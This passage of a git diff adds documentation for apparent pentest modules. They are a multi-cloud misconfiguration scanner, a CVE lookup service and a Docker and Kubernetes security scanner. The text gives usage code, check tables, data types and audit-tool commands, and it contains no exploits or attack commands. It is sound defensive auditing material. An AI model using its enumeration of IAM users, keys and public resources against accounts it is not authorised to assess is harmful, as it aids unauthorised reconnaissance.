analysis +│ ├── ec2.ts # EC2 instance security +│ └── lambda.ts # Lambda function security +├── azure/ +│ ├── index.ts # Azure module exports +│ ├── rbac.ts # RBAC analysis +│ ├── storage.ts # Storage account security +│ ├── nsg.ts # Network Security Groups +│ └── vm.ts # VM and Function App security +└── gcp/ + ├── index.ts # GCP module exports + ├── iam.ts # IAM & service accounts + ├── gcs.ts # Cloud Storage security + ├── firewall.ts # Firewall rule analysis + └── compute.ts # GCE & Cloud Functions +``` + +## Usage + +### AWS Security Scanning + +```typescript +import { AWSIAM, AWSS3, AWSSecurityGroups, AWSEC2, AWSLambda } from "./pentest/cloudscan" + +// IAM enumeration and analysis +const iamResult = await AWSIAM.enumerate("scan_123", { + profile: "production", + region: "us-east-1", +}) + +console.log(`Users: ${iamResult.users.length}`) +console.log(`Roles: ${iamResult.roles.length}`) +console.log(`Policies: ${iamResult.policies.length}`) +console.log(`Issues: ${iamResult.issues.length}`) + +// Check for users without MFA +const noMFA = await AWSIAM.getUsersWithoutMFA({ profile: "production" }) +console.log(`Users without MFA: ${noMFA.length}`) + +// Check for old access keys +const oldKeys = await AWSIAM.getUsersWithOldAccessKeys(90, { profile: "production" }) + +// S3 bucket security analysis +const s3Result = await AWSS3.enumerate("scan_123", { profile: "production" }) + +// Get public buckets +const publicBuckets = await AWSS3.getPublicBuckets({ profile: "production" }) +console.log(`Public buckets: ${publicBuckets.length}`) + +// Get unencrypted buckets +const unencrypted = await AWSS3.getUnencryptedBuckets({ profile: "production" }) + +// Security group analysis +const sgResult = await AWSSecurityGroups.enumerate("scan_123", { + profile: "production", + region: "us-east-1", +}) + +// Get groups with public SSH +const publicSSH = await AWSSecurityGroups.getGroupsWithPublicPort(22, { + profile: "production", + region: "us-east-1", +}) + +// EC2 instance analysis +const ec2Result = await AWSEC2.enumerate("scan_123", { + profile: "production", + region: "us-east-1", +}) + +// Get instances without IMDSv2 +const noIMDSv2 = await AWSEC2.getInstancesWithoutIMDSv2({ + profile: "production", + region: "us-east-1", +}) + +// Lambda function analysis +const lambdaResult = await AWSLambda.enumerate("scan_123", { + profile: "production", + region: "us-east-1", +}) + +// Get public Lambda functions +const publicFunctions = await AWSLambda.getPublicFunctions({ + profile: "production", + region: "us-east-1", +}) +``` + +### Azure Security Scanning + +```typescript +import { AzureRBAC, AzureStorage, AzureNSG, AzureVM } from "./pentest/cloudscan" + +// RBAC analysis +const rbacResult = await AzureRBAC.enumerate("scan_123", { + subscriptionId: "sub-123", +}) + +console.log(`Users: ${rbacResult.users.length}`) +console.log(`Service Principals: ${rbacResult.servicePrincipals.length}`) +console.log(`Role Assignments: ${rbacResult.roleAssignments.length}`) + +// Get high-privilege assignments +const highPriv = await AzureRBAC.getHighPrivilegeAssignments({ + subscriptionId: "sub-123", +}) + +// Storage account analysis +const storageResult = await AzureStorage.enumerate("scan_123", { + subscriptionId: "sub-123", +}) + +// Get storage accounts with public access +const publicStorage = await AzureStorage.getPublicStorageAccounts({ + subscriptionId: "sub-123", +}) + +// NSG analysis +const nsgResult = await AzureNSG.enumerate("scan_123", { + subscriptionId: "sub-123", +}) + +// Get NSGs with unrestricted ingress +const publicNSGs = await AzureNSG.getNSGsWithPublicIngress({ + subscriptionId: "sub-123", +}) + +// VM analysis +const vmResult = await AzureVM.enumerate("scan_123", { + subscriptionId: "sub-123", +}) + +// Get VMs without managed identity +const noIdentity = await AzureVM.getVMsWithoutManagedIdentity({ + subscriptionId: "sub-123", +}) +``` + +### GCP Security Scanning + +```typescript +import { GCPIAM, GCPGCS, GCPFirewall, GCPCompute } from "./pentest/cloudscan" + +// IAM analysis +const iamResult = await GCPIAM.enumerate("scan_123", { + projectId: "my-project", +}) + +console.log(`Service Accounts: ${iamResult.serviceAccounts.length}`) +console.log(`Custom Roles: ${iamResult.customRoles.length}`) +console.log(`IAM Bindings: ${iamResult.iamBindings.length}`) + +// Get service accounts with user-managed keys +const withKeys = await GCPIAM.getServiceAccountsWithKeys({ + projectId: "my-project", +}) + +// Get public IAM bindings +const publicBindings = await GCPIAM.getPublicBindings({ + projectId: "my-project", +}) + +// GCS bucket analysis +const gcsResult = await GCPGCS.enumerate("scan_123", { + projectId: "my-project", +}) + +// Get public buckets +const publicBuckets = await GCPGCS.getPublicBuckets({ + projectId: "my-project", +}) + +// Firewall analysis +const fwResult = await GCPFirewall.enumerate("scan_123", { + projectId: "my-project", +}) + +// Get rules with public ingress +const publicRules = await GCPFirewall.getRulesWithPublicIngress({ + projectId: "my-project", +}) + +// Compute analysis +const computeResult = await GCPCompute.enumerate("scan_123", { + projectId: "my-project", +}) + +// Get instances with default service account +const defaultSA = await GCPCompute.getInstancesWithDefaultSA({ + projectId: "my-project", +}) + +// Get public Cloud Functions +const publicFunctions = await GCPCompute.getPublicFunctions({ + projectId: "my-project", +}) +``` + +### Running Full Scans + +```typescript +import { CloudScanOrchestrator, CloudScanProfiles } from "./pentest/cloudscan" + +// Quick scan +const result = await CloudScanOrchestrator.quickScan({ + provider: "aws", + regions: ["us-east-1", "us-west-2"], + awsProfile: "production", +}) + +// Standard scan with compliance +const result = await CloudScanOrchestrator.scan({ + provider: "aws", + profile: "standard", + regions: ["us-east-1"], + complianceFrameworks: ["cis", "pci-dss"], + awsProfile: "production", +}) + +// Thorough scan with external tools +const result = await CloudScanOrchestrator.thoroughScan({ + provider: "aws", + regions: ["us-east-1"], + awsProfile: "production", + useProwler: true, + useScoutSuite: true, +}) + +// Focused scans +const iamResult = await CloudScanOrchestrator.iamScan({ + provider: "azure", + azureSubscription: "sub-123", +}) + +const storageResult = await CloudScanOrchestrator.storageScan({ + provider: "gcp", + gcpProject: "my-project", +}) + +const networkResult = await CloudScanOrchestrator.networkScan({ + provider: "aws", + regions: ["us-east-1"], + awsProfile: "production", +}) + +// Compliance-only scan +const complianceResult = await CloudScanOrchestrator.complianceScan({ + provider: "aws", + frameworks: ["cis", "nist", "hipaa"], + awsProfile: "production", +}) +``` + +### Compliance Checking + +```typescript +import { ComplianceChecker } from "./pentest/cloudscan" + +// Evaluate findings against CIS benchmarks +const cisResult = ComplianceChecker.evaluate( + "scan_123", + "aws", + "cis", + findings +) + +console.log(`Pass Rate: ${cisResult.summary.passRate}%`) +console.log(`Failed Checks: ${cisResult.summary.failed}`) + +// Evaluate multiple frameworks +const results = ComplianceChecker.evaluateAll( + "scan_123", + "aws", + ["cis", "nist", "pci-dss", "hipaa"], + findings +) + +// Get framework info +const info = ComplianceChecker.getFrameworkInfo("cis") +console.log(`${info.name} v${info.version}`) +``` + +### Discovery + +```typescript +import { CloudDiscovery } from "./pentest/cloudscan" + +// Check prerequisites +const prereqs = await CloudDiscovery.checkPrerequisites("aws") +console.log(`CLI Installed: ${prereqs.cliInstalled}`) +console.log(`Authenticated: ${prereqs.authenticated}`) + +// Get available regions +const regions = await CloudDiscovery.getRegions("aws") + +// Discover resources +const discovery = await CloudDiscovery.discover("scan_123", { + provider: "aws", + regions: ["us-east-1"], + awsProfile: "production", +}) + +console.log(`Total Resources: ${discovery.summary.totalResources}`) +console.log(`Users: ${discovery.resources.iam.users.length}`) +console.log(`Buckets: ${discovery.resources.storage.length}`) +console.log(`Security Groups: ${discovery.resources.network.securityGroups.length}`) +console.log(`Instances: ${discovery.resources.compute.instances.length}`) +``` + +### Tool Actions + +The `cloudscan` tool supports the following actions: + +| Action | Description | +|--------|-------------| +| `discover` | Enumerate cloud resources | +| `scan` | Run security scan with profile | +| `quick-scan` | Fast assessment | +| `full-scan` | Comprehensive scan with external tools | +| `iam-scan` | IAM/RBAC focused scan | +| `storage-scan` | Storage bucket focused scan | +| `network-scan` | Security group focused scan | +| `compliance` | Compliance framework check | +| `prowler` | Run Prowler tool | +| `scoutsuite` | Run ScoutSuite tool | +| `status` | Get scan status | +| `profiles` | List available scan profiles | +| `prerequisites` | Check CLI tools and auth | +| `regions` | List available regions | + +## Scan Profiles + +| Profile | Discovery | Security | Compliance | External Tools | Use Case | +|---------|-----------|----------|------------|----------------|----------| +| `discovery` | yes | no | no | no | Resource enumeration only | +| `quick` | yes | yes | no | no | Fast assessment | +| `standard` | yes | yes | yes (CIS) | no | Normal assessment | +| `thorough` | yes | yes | yes (all) | yes | Comprehensive audit | +| `compliance` | yes | yes | yes | no | Compliance-focused | +| `iam-focused` | yes | yes | yes | no | IAM-specific | +| `storage-focused` | yes | yes | yes | no | Storage-specific | +| `network-focused` | yes | yes | yes | no | Network-specific | +| `custom` | configurable | configurable | configurable | configurable | Custom configuration | + +## Security Checks + +### IAM Checks + +| Check | Provider | Severity | Description | +|-------|----------|----------|-------------| +| MFA Enabled | AWS/Azure | High | Users should have MFA enabled | +| No Root Access Keys | AWS | Critical | Root account should not have access keys | +| Access Key Rotation | All | Medium | Access keys should be rotated regularly | +| Least Privilege | All | Medium | Overly permissive policies detected | +| Public IAM Bindings | GCP | Critical | allUsers or allAuthenticatedUsers bindings | +| Service Account Keys | GCP | Medium | User-managed keys instead of workload identity | + +### Storage Checks + +| Check | Provider | Severity | Description | +|-------|----------|----------|-------------| +| No Public Access | All | High | Public access prevention not enforced | +| Encryption Enabled | All | High | Server-side encryption required | +| Versioning Enabled | All | Low | Object versioning for recovery | +| Access Logging | All | Medium | Access logging for audit | +| HTTPS Only | AWS/Azure | Medium | Require secure transport | +| Uniform Access | GCP | Medium | Uniform bucket-level access instead of ACLs | + +### Network Checks + +| Check | Provider | Severity | Description | +|-------|----------|----------|-------------| +| No Unrestricted Ingress | All | Critical | 0.0.0.0/0 on all ports | +| No SSH from Internet | All | High | Port 22 exposed to 0.0.0.0/0 | +| No RDP from Internet | All | High | Port 3389 exposed to 0.0.0.0/0 | +| No Database from Internet | All | Critical | MySQL/PostgreSQL/MongoDB exposed | +| VPC Flow Logs | All | Medium | Network flow logging enabled | + +### Compute Checks + +| Check | Provider | Severity | Description | +|-------|----------|----------|-------------| +| No Public IP | All | Medium | Instances without public IPs preferred | +| IMDSv2 Required | AWS | Medium | Instance metadata service v2 | +| Managed Identity | Azure | Medium | VMs using managed identity | +| No Default SA | GCP | Medium | Custom service account instead of default | +| No Secrets in Env | All | High | Secrets in function environment variables | + +## Compliance Frameworks + +| Framework | Description | Version | +|-----------|-------------|---------| +| `cis` | CIS Benchmarks | 2.0 | +| `nist` | NIST Cybersecurity Framework | 1.1 | +| `pci-dss` | Payment Card Industry DSS | 4.0 | +| `hipaa` | Health Insurance Portability | 2023 | +| `soc2` | Service Organization Control 2 | 2017 | +| `gdpr` | General Data Protection Regulation | 2018 | +| `iso27001` | Information Security Management | 2022 | +| `aws-foundational-security` | AWS Security Best Practices | 1.0 | +| `azure-security-benchmark` | Azure Security Benchmark | 3.0 | +| `gcp-security-foundations` | GCP Security Foundations | 1.0 | + +## Events + +The module emits the following events: + +| Event | Description | +|-------|-------------| +| `pentest.cloudscan.scan_started` | Cloud scan began | +| `pentest.cloudscan.scan_completed` | Scan finished | +| `pentest.cloudscan.scan_failed` | Scan failed | +| `pentest.cloudscan.discovery_started` | Resource discovery began | +| `pentest.cloudscan.discovery_completed` | Discovery finished | +| `pentest.cloudscan.bucket_found` | Storage bucket discovered | +| `pentest.cloudscan.public_bucket_found` | Public bucket detected | +| `pentest.cloudscan.iam_user_found` | IAM user enumerated | +| `pentest.cloudscan.iam_role_found` | IAM role enumerated | +| `pentest.cloudscan.iam_policy_issue` | IAM policy issue detected | +| `pentest.cloudscan.security_group_found` | Security group discovered | +| `pentest.cloudscan.insecure_rule_found` | Insecure firewall rule detected | +| `pentest.cloudscan.instance_found` | Compute instance discovered | +| `pentest.cloudscan.function_found` | Serverless function discovered | +| `pentest.cloudscan.finding_detected` | Security finding generated | +| `pentest.cloudscan.compliance_violation` | Compliance check failed | +| `pentest.cloudscan.compliance_complete` | Compliance evaluation finished | +| `pentest.cloudscan.external_tool_completed` | External tool finished | + +## Storage + +Cloud scan data is persisted in: + +``` +pentest/cloudscan/ + scans/ + cloudscan_abc123.json # Scan results +``` + +## Data Types + +### CloudScanResult + +```typescript +{ + id: string + provider: "aws" | "azure" | "gcp" + profile: string + status: "running" | "completed" | "failed" + startTime: number + endTime?: number + discovery: DiscoveryResult + findings: CloudFinding[] + compliance: ComplianceResult[] + summary: { + totalResources: number + totalFindings: number + bySeverity: { critical, high, medium, low, info } + byCategory: Record + } + errors: string[] +} +``` + +### CloudFinding + +```typescript +{ + id: string + provider: "aws" | "azure" | "gcp" + region?: string + severity: "critical" | "high" | "medium" | "low" | "info" + title: string + description: string + resourceType: string + resourceId: string + category: string + complianceFrameworks?: string[] + remediation?: string + foundAt: number + source: "scanner" | "prowler" | "scoutsuite" +} +``` + +### IAMPrincipal + +```typescript +{ + id: string + name: string + type: "user" | "role" | "service-account" | "group" + arn?: string + email?: string + createdAt?: number + lastUsed?: number + mfaEnabled?: boolean + accessKeys: AccessKey[] + attachedPolicies: string[] + inlinePolicies: string[] + groups?: string[] + issues: string[] +} +``` + +### StorageBucket + +```typescript +{ + id: string + name: string + provider: "aws" | "azure" | "gcp" + region?: string + createdAt?: number + publicAccessBlocked?: boolean + versioningEnabled?: boolean + loggingEnabled?: boolean + encryption?: { + enabled: boolean + keyId?: string + customerManaged?: boolean + } + accessLevel?: string + issues?: string[] +} +``` + +### SecurityGroup + +```typescript +{ + id: string + name: string + vpcId?: string + description?: string + rules: SecurityRule[] + hasPublicIngress: boolean + hasUnrestrictedIngress: boolean + tags?: Record +} +``` + +### ComplianceCheck + +```typescript +{ + id: string + framework: string + controlId: string + title: string + description: string + status: "pass" | "fail" | "unknown" + severity: "critical" | "high" | "medium" | "low" | "info" + resourceType: string + findings: string[] + remediation?: string +} +``` + +## External Tool Parsers + +### Prowler + +```typescript +import { ProwlerParser } from "./pentest/cloudscan" + +const output = await runProwler() +const findings = ProwlerParser.parseOutput(output, "aws") + +console.log(`Findings: ${findings.length}`) +``` + +### ScoutSuite + +```typescript +import { ScoutSuiteParser } from "./pentest/cloudscan" + +const output = await runScoutSuite() +const findings = ScoutSuiteParser.parseOutput(output, "aws") + +console.log(`Findings: ${findings.length}`) +``` + +## Testing + +Run the cloudscan tests with: + +```bash +bun test test/pentest/cloudscan.test.ts +``` + +The test suite covers: +- AWS CLI output parsing +- Azure CLI output parsing +- gcloud CLI output parsing +- Prowler output parsing +- ScoutSuite output parsing +- Profile configurations +- Storage operations +- Type validation +- Compliance checking + +## Dependencies + +The module uses external CLI tools: +- `aws` - AWS CLI for resource enumeration +- `az` - Azure CLI for resource enumeration +- `gcloud` - Google Cloud CLI for resource enumeration +- `prowler` - AWS/Azure/GCP security assessment +- `scout` - ScoutSuite multi-cloud security auditing + +Existing modules used: +- Storage, Bus, Log +- Patterns from: netscan, apiscan modules (Tool.define, storage, events) + +## Example Tool Usage + +```bash +# Check prerequisites +cloudscan prerequisites provider=aws + +# List available regions +cloudscan regions provider=aws + +# Resource discovery +cloudscan discover provider=aws regions=["us-east-1"] + +# Quick scan +cloudscan quick-scan provider=aws awsProfile=production + +# Full scan with external tools +cloudscan full-scan provider=aws regions=["us-east-1","us-west-2"] + +# IAM-focused scan +cloudscan iam-scan provider=azure azureSubscription=sub-123 + +# Storage-focused scan +cloudscan storage-scan provider=gcp gcpProject=my-project + +# Compliance scan +cloudscan compliance provider=aws frameworks=["cis","pci-dss","hipaa"] + +# Run Prowler +cloudscan prowler provider=aws awsProfile=production + +# Run ScoutSuite +cloudscan scoutsuite provider=aws + +# Check scan status +cloudscan status scanId=cloudscan_abc123 + +# List profiles +cloudscan profiles +``` diff --git a/docs/PHASE12-container-security.md b/docs/PHASE12-container-security.md new file mode 100644 index 00000000000..dbf58148a57 --- /dev/null +++ b/docs/PHASE12-container-security.md @@ -0,0 +1,619 @@ +# Phase 12: Container Security Scanner + CVE Lookup Service + +## Overview + +Phase 12 introduces two interconnected modules: + +1. **CVE Lookup Service** (`pentest/cve/`) - Shared utility for CVE enrichment across all scanners +2. **Container Security Scanner** (`pentest/containerscan/`) - Docker, Kubernetes, and registry security testing + +## Part A: CVE Lookup Service + +The CVE Lookup Service provides centralized vulnerability data enrichment from multiple authoritative sources. + +### Module Structure + +``` +src/pentest/cve/ +├── index.ts # Module exports +├── types.ts # Zod schemas for CVE data +├── cache.ts # File-based caching with TTL +├── lookup.ts # NVD, OSV, CISA KEV API integration +├── enricher.ts # Finding enrichment utilities +└── tool.ts # CVETool for agent +``` + +### External APIs + +| API | Purpose | Rate Limit | +|-----|---------|------------| +| NVD API 2.0 | Official NIST CVE database | 5 req/30s (no key), 50 req/30s (with key) | +| OSV API | Open Source Vulnerabilities | No limit | +| CISA KEV | Known Exploited Vulnerabilities | No limit | + +### Usage + +```typescript +import { CVELookup, CVECache, CVEEnricher } from "./pentest/cve" + +// Look up a single CVE +const cve = await CVELookup.lookup("CVE-2021-44228") +console.log(`CVSS: ${cve.cvss?.v3?.score}`) +console.log(`Severity: ${cve.cvss?.v3?.severity}`) +console.log(`In CISA KEV: ${cve.exploitability?.inKEV}`) + +// Bulk lookup +const cves = await CVELookup.bulkLookup([ + "CVE-2021-44228", + "CVE-2023-44487", + "CVE-2024-3094" +]) + +// Search CVEs by keyword +const results = await CVELookup.search({ + keyword: "log4j", + startDate: "2021-01-01", + severityType: "critical" +}) + +// Check against CISA KEV +const kevResults = await CVELookup.checkKEV(["CVE-2021-44228", "CVE-2023-44487"]) +console.log(`In KEV: ${kevResults.inKEV.length}`) + +// Enrich findings with CVE data +const enriched = await CVEEnricher.enrichFindings(findings, { + fetchMissing: true, + checkKEV: true +}) + +// Cache management +await CVECache.warmup(["CVE-2021-44228", "CVE-2023-44487"]) +const stats = await CVECache.getStats() +console.log(`Cache hits: ${stats.hits}, misses: ${stats.misses}`) +``` + +### Tool Actions + +| Action | Description | +|--------|-------------| +| `lookup` | Look up single CVE | +| `bulk-lookup` | Look up multiple CVEs | +| `search` | Search CVEs by keyword/product | +| `kev-check` | Check if CVEs are in CISA KEV | +| `enrich-findings` | Enrich findings with CVE data | +| `cache-stats` | Get cache statistics | +| `clear-cache` | Clear the CVE cache | + +### Data Types + +#### CVEData + +```typescript +{ + id: string // CVE-2024-1234 + description: string + cvss: { + v4?: { score: number; vector: string; severity: string } + v3?: { score: number; vector: string; severity: string } + v2?: { score: number; vector: string } + } + cwe: string[] // CWE-79, CWE-89 + references: string[] + publishedDate: string + lastModifiedDate: string + exploitability?: { + inKEV: boolean // CISA Known Exploited + hasPublicExploit: boolean + exploitMaturity: string + } + affected?: { + vendor: string + product: string + versions: string[] + }[] +} +``` + +--- + +## Part B: Container Security Scanner + +The Container Security Scanner provides comprehensive container and orchestration security testing. + +### Module Structure + +``` +src/pentest/containerscan/ +├── index.ts # Module exports +├── types.ts # ContainerScanTypes namespace +├── events.ts # ContainerScanEvents +├── storage.ts # Scan persistence +├── profiles.ts # Scan profiles +├── tool.ts # ContainerScanTool +├── orchestrator.ts # Scan coordination +├── parsers/ +│ ├── index.ts +│ ├── trivy.ts # Trivy JSON parser +│ ├── grype.ts # Grype JSON parser +│ ├── syft.ts # Syft SBOM parser +│ └── kubeaudit.ts # Kubeaudit parser +├── docker/ +│ ├── index.ts +│ ├── images.ts # Image enumeration & scanning +│ ├── containers.ts # Running container analysis +│ ├── config.ts # Docker daemon config audit +│ └── secrets.ts # Secret detection in images +├── kubernetes/ +│ ├── index.ts +│ ├── cluster.ts # Cluster enumeration +│ ├── pods.ts # Pod security analysis +│ ├── rbac.ts # RBAC analysis +│ ├── network.ts # Network policy analysis +│ ├── secrets.ts # K8s secrets audit +│ └── admission.ts # Admission controller checks +└── registry/ + ├── index.ts + ├── dockerhub.ts # Docker Hub integration + ├── ecr.ts # AWS ECR + ├── acr.ts # Azure ACR + ├── gcr.ts # Google GCR/Artifact Registry + └── scanner.ts # Registry scanning orchestration +``` + +### Usage + +#### Docker Image Scanning + +```typescript +import { DockerImages, DockerContainers, DockerConfig, DockerSecrets } from "./pentest/containerscan" + +// List local images +const images = await DockerImages.list() +console.log(`Found ${images.length} images`) + +// Scan an image for vulnerabilities +const scanResult = await DockerImages.scanWithTrivy("nginx:latest") +console.log(`Vulnerabilities: ${scanResult.vulnerabilities.length}`) + +// Scan with multiple tools +const fullResult = await DockerImages.scanImage("nginx:latest", { + useTrivy: true, + useGrype: true, + generateSBOM: true +}) + +// Generate SBOM +const sbom = await DockerImages.generateSBOM("nginx:latest") +console.log(`Components: ${sbom.components.length}`) + +// Analyze running containers +const containers = await DockerContainers.list() +const analysis = await DockerContainers.analyzeAll() +console.log(`Privileged containers: ${analysis.filter(c => c.privileged).length}`) + +// Audit Docker daemon configuration +const configFindings = await DockerConfig.audit() +console.log(`Config issues: ${configFindings.length}`) + +// Scan for secrets +const secrets = await DockerSecrets.scanImage("myapp:latest") +console.log(`Secrets found: ${secrets.length}`) +``` + +#### Kubernetes Security Scanning + +```typescript +import { + KubernetesCluster, + KubernetesPods, + KubernetesRBAC, + KubernetesNetwork, + KubernetesSecrets, + KubernetesAdmission +} from "./pentest/containerscan" + +// Check cluster connectivity +const connected = await KubernetesCluster.isConnected() +const clusterInfo = await KubernetesCluster.getInfo() +console.log(`Cluster: ${clusterInfo.name} (${clusterInfo.version})`) + +// Analyze pod security +const pods = await KubernetesPods.list() +const podAnalysis = await KubernetesPods.analyzeAll() +console.log(`Pods with issues: ${podAnalysis.filter(p => p.findings.length > 0).length}`) + +// Get privileged pods +const privilegedPods = await KubernetesPods.getPrivileged() +console.log(`Privileged pods: ${privilegedPods.length}`) + +// RBAC analysis +const rbacFindings = await KubernetesRBAC.analyze() +console.log(`RBAC issues: ${rbacFindings.length}`) + +// Get cluster-admin bindings +const clusterAdmins = await KubernetesRBAC.getClusterAdminBindings() +console.log(`Cluster-admin bindings: ${clusterAdmins.length}`) + +// Network policy analysis +const networkCoverage = await KubernetesNetwork.analyzeCoverage() +console.log(`Namespaces without policies: ${networkCoverage.unprotectedNamespaces.length}`) + +// Secrets analysis +const secretsAnalysis = await KubernetesSecrets.analyze() +console.log(`Secrets: ${secretsAnalysis.length}`) + +// Admission controller analysis +const admissionAnalysis = await KubernetesAdmission.analyze() +console.log(`PSA Enforced: ${admissionAnalysis.psaEnforced}`) +``` + +#### Registry Scanning + +```typescript +import { RegistryScanner, DockerHub, AWSECR, AzureACR, GoogleGCR } from "./pentest/containerscan" + +// Docker Hub +const hubImages = await DockerHub.listImages("myorg") +await DockerHub.scanRepository("myorg/myapp") + +// AWS ECR +const ecrImages = await AWSECR.listImages("my-repo", { region: "us-east-1" }) +const ecrFindings = await AWSECR.getFindings("my-repo", "sha256:abc123", { + region: "us-east-1" +}) + +// Azure ACR +const acrImages = await AzureACR.listImages("myacr", "my-repo") +await AzureACR.checkSecurity("myacr") + +// Google GCR/Artifact Registry +const gcrImages = await GoogleGCR.listImages("my-project") +const gcrVulns = await GoogleGCR.getVulnerabilities("my-project", "gcr.io/my-project/myapp@sha256:abc") + +// Registry scanning orchestration +const registryResult = await RegistryScanner.scanRegistry({ + type: "ecr", + url: "123456789.dkr.ecr.us-east-1.amazonaws.com", + name: "Production ECR", + authenticated: true, + region: "us-east-1" +}, { + scanVulnerabilities: true, + generateSBOM: true, + maxImages: 50 +}) +``` + +#### Running Full Scans + +```typescript +import { ContainerScanOrchestrator, ContainerScanProfiles } from "./pentest/containerscan" + +// Quick scan +const quickResult = await ContainerScanOrchestrator.scan({ + profile: "quick", + scanDocker: true, + scanKubernetes: false +}) + +// Standard scan with K8s +const standardResult = await ContainerScanOrchestrator.scan({ + profile: "standard", + scanDocker: true, + scanKubernetes: true, + complianceFrameworks: ["cis-docker"] +}) + +// Thorough scan with all tools +const thoroughResult = await ContainerScanOrchestrator.scan({ + profile: "thorough", + scanDocker: true, + scanKubernetes: true, + scanRegistries: ["ecr", "gcr"], + complianceFrameworks: ["cis-docker", "cis-kubernetes"] +}) + +// Image-only scan +const imageResult = await ContainerScanOrchestrator.scanImage("nginx:latest", { + useTrivy: true, + useGrype: true, + generateSBOM: true +}) + +// Runtime scan +const runtimeResult = await ContainerScanOrchestrator.scanRuntime() + +// Cluster scan +const clusterResult = await ContainerScanOrchestrator.scanCluster({ + rbac: true, + pods: true, + network: true, + secrets: true, + admission: true +}) + +// Compliance scan +const complianceResult = await ContainerScanOrchestrator.scanCompliance({ + framework: "cis-kubernetes", + kubeaudit: true +}) +``` + +### Tool Actions + +| Action | Description | +|--------|-------------| +| `discover` | Enumerate images, containers, registries | +| `scan` | Run security scan with profile | +| `scan-image` | Scan specific image for vulnerabilities | +| `scan-runtime` | Analyze running containers | +| `scan-registry` | Scan images in a registry | +| `scan-cluster` | Kubernetes cluster security audit | +| `sbom` | Generate SBOM for image | +| `compliance` | CIS Docker/Kubernetes benchmark | +| `status` | Get scan status | +| `profiles` | List available scan profiles | + +### Scan Profiles + +| Profile | Images | Runtime | K8s | Compliance | External Tools | +|---------|--------|---------|-----|------------|----------------| +| `discovery` | list | list | list | no | no | +| `quick` | trivy | basic | no | no | trivy | +| `standard` | trivy+grype | full | pods | CIS | trivy, grype | +| `thorough` | all | full | full | all | trivy, grype, kubeaudit | +| `compliance` | config | config | full | all | kubeaudit | +| `sbom-only` | sbom | no | no | no | syft | + +### Security Checks + +#### Docker Image Checks + +| Check | Severity | Description | +|-------|----------|-------------| +| Known CVEs | Varies | Vulnerabilities detected by Trivy/Grype | +| Outdated Base Image | Medium | Base image has known updates | +| Root User | Medium | Container runs as root | +| Exposed Secrets | Critical | API keys, passwords in image layers | +| Insecure Packages | High | Packages with known vulnerabilities | +| Missing Health Check | Low | No HEALTHCHECK instruction | + +#### Docker Runtime Checks + +| Check | Severity | Description | +|-------|----------|-------------| +| Privileged Container | Critical | --privileged flag used | +| Host Network | High | Host network namespace shared | +| Host PID/IPC | High | Host PID/IPC namespace shared | +| Sensitive Mounts | Critical | /etc, /var/run/docker.sock mounted | +| Added Capabilities | Medium | CAP_SYS_ADMIN, CAP_NET_RAW, etc. | +| No Resource Limits | Low | CPU/memory limits not set | +| Writable Root FS | Medium | Root filesystem not read-only | + +#### Kubernetes Checks + +| Check | Severity | Description | +|-------|----------|-------------| +| Privileged Pod | Critical | securityContext.privileged: true | +| Host Network/PID/IPC | High | hostNetwork/hostPID/hostIPC: true | +| Root User | Medium | runAsNonRoot: false or runAsUser: 0 | +| Cluster-Admin Binding | Critical | ClusterRoleBinding to cluster-admin | +| Wildcard Permissions | High | RBAC with "*" verbs or resources | +| Default Service Account | Medium | Default SA with automountServiceAccountToken | +| Missing Network Policy | Medium | Namespace without NetworkPolicy | +| Unencrypted Secrets | Medium | Secrets not encrypted at rest | +| No PSA Enforcement | Medium | Pod Security Admission not enforced | + +### Events + +| Event | Description | +|-------|-------------| +| `pentest.containerscan.scan_started` | Scan began | +| `pentest.containerscan.scan_completed` | Scan finished | +| `pentest.containerscan.scan_failed` | Scan failed | +| `pentest.containerscan.image_found` | Docker image discovered | +| `pentest.containerscan.container_found` | Running container discovered | +| `pentest.containerscan.vulnerability_found` | CVE detected in image | +| `pentest.containerscan.misconfiguration_found` | Security misconfiguration detected | +| `pentest.containerscan.secret_found` | Secret detected in image/container | +| `pentest.containerscan.sbom_generated` | SBOM generated for image | +| `pentest.containerscan.compliance_violation` | Compliance check failed | +| `pentest.containerscan.pod_found` | Kubernetes pod discovered | +| `pentest.containerscan.rbac_issue_found` | RBAC misconfiguration detected | +| `pentest.containerscan.network_policy_gap` | Network policy gap detected | +| `pentest.containerscan.registry_scan_completed` | Registry scan finished | + +### Storage + +Container scan data is persisted in: + +``` +pentest/containerscan/ + scans/ + containerscan_abc123.json # Scan results + sboms/ + nginx_latest.json # SBOM files + images/ + image_abc123.json # Image scan results +``` + +### Data Types + +#### ContainerScanResult + +```typescript +{ + id: string + profile: string + status: "pending" | "running" | "completed" | "failed" + startTime: number + endTime?: number + docker: { + images: ImageScanResult[] + containers: ContainerAnalysis[] + configFindings: ContainerFinding[] + } + kubernetes?: { + cluster: ClusterInfo + pods: PodAnalysis[] + rbac: RBACFinding[] + network: NetworkPolicyAnalysis + secrets: SecretAnalysis[] + admission: AdmissionAnalysis + } + registries?: RegistryScanResult[] + compliance?: ComplianceResult[] + findings: ContainerFinding[] + summary: { + totalImages: number + totalContainers: number + totalVulnerabilities: number + bySeverity: { critical, high, medium, low } + } +} +``` + +#### ContainerFinding + +```typescript +{ + id: string + category: "vulnerability" | "misconfiguration" | "secret" | "compliance" + severity: "critical" | "high" | "medium" | "low" | "info" + title: string + description: string + resource: { + type: "image" | "container" | "pod" | "cluster" | "registry" + name: string + namespace?: string + } + cve?: string + cvss?: number + remediation?: string + references?: string[] + detectedAt: number +} +``` + +#### ImageVulnerability + +```typescript +{ + id: string + cveId: string + severity: "critical" | "high" | "medium" | "low" | "unknown" + pkgName: string + installedVersion: string + fixedVersion?: string + title?: string + description?: string + cvss?: number + references?: string[] +} +``` + +### External Tool Commands + +```bash +# Trivy - Image vulnerability scanning +trivy image --format json --severity HIGH,CRITICAL nginx:latest + +# Grype - Image vulnerability scanning +grype nginx:latest -o json + +# Syft - SBOM generation +syft nginx:latest -o json + +# Kubeaudit - Kubernetes audit +kubeaudit all --json +``` + +### Example Tool Usage + +```bash +# Discover images and containers +containerscan discover + +# Scan a specific image +containerscan scan-image image=nginx:latest + +# Generate SBOM +containerscan sbom image=nginx:latest format=cyclonedx + +# Scan running containers +containerscan scan-runtime + +# Scan Kubernetes cluster +containerscan scan-cluster rbac=true pods=true network=true + +# Run compliance check +containerscan compliance framework=cis-docker + +# Scan a registry +containerscan scan-registry type=ecr region=us-east-1 + +# Full scan with profile +containerscan scan profile=thorough + +# Check scan status +containerscan status scanId=containerscan_abc123 + +# List profiles +containerscan profiles +``` + +--- + +## Dependencies + +### External Tools Required + +| Tool | Purpose | Installation | 